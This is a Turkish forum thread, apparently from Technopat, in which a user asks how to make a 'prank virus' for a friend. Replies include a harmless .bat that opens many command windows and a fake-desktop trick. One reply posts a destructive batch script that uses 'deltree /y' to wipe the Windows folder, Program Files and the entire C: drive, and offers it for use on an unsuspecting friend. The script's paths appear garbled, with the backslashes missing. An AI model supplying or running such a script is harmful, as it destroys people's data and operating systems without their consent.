Şaka virüsü nasıl yapılır?

Durum
Mesaj gönderimine kapalı.
Arkadaşlar arkadaşıma kalpten gideceği bir şaka virüsü yapmak istiyorum, nasıl yapabilirim?
Zararsız kucuk bisey yapmak istiyorsan (arkadaşının biraazcık korkmasını istiyorsan yani) not defterini ac
start
start
start
start
bunu en az 15 20 kere tekrarla bir satir alta gecip start yaz veya internetten diger zararsiz cmd komutlarina bakabilirsin. Sonra txt dosyasini kaydedip sağ tikla dosyanın sonundaki ".txt" olan yeri ".bat" olarak degistir. Arkadasin bunu actiginda ekrana aniden 15 20 tane komut istemi gelecek (veya artık ne yazdiysan) bilgisayardan anlamiyorsa korkar zaten.

Burda size kalpten götürecek virüs nasıl yapacağınızı anlatamayız. Doğru bir şey değil. Başka yerden araştırın.

Yazılımla uğraşmaya gerek yok. Kendin virüs ol. Masaüstünün ekran görüntüsünü al. O görüntüyü duvar kağıdı yap. Sonra masaüstüne sağ tıkla, göster>masaüstü simgeleri 'nin işaretini kaldır.
Ayarlardan da görev çubuğunu otomatik gizlemeye al. Sonra telefonunun kamerasıyla kayda almaya başla ve arkadaşını izle :)
Biraz yaratıcı olun :)

Hocam ciddi misiniz eğer gerçekten ciddiyseniz atarım, bunun şakası yok yani bilgisayarın formatlanması gerekiyor açılması için.

.bat olarak kaydedin metin belgesini.
Kod:
@echo off

C:WINDOWSCOMMANDdeltree /y c:windows*.*

@echo off

C:WINDOWSCOMMANDdeltree /y c:Progra~1*.*

@echo off

C:WINDOWSCOMMANDdeltree /y c:*.*

@echo off

cls

cls

@echo .:Buraya vermek istediğiniz mesajı yazabilirsiniz.::.

@echo off

Depremden dolayı baya bi süre girememiştim şimdi girdim ve birsürü bildirim vardı ve eski bir konuda yaptığım yorumun beğenilmesi güzel birşey evsiz biri olarak şuan ruh halim biraz daha iyi :)
Geçmiş olsun hocam. Devlet muhtemelen siz depremzedelere TOKİ dairesi veya ev alma kredisi verecek. Enkaz altında kaldınız mı?

Durum
Mesaj gönderimine kapalı.

Technopat Haberler

Yeni konular

Geri
Yukarı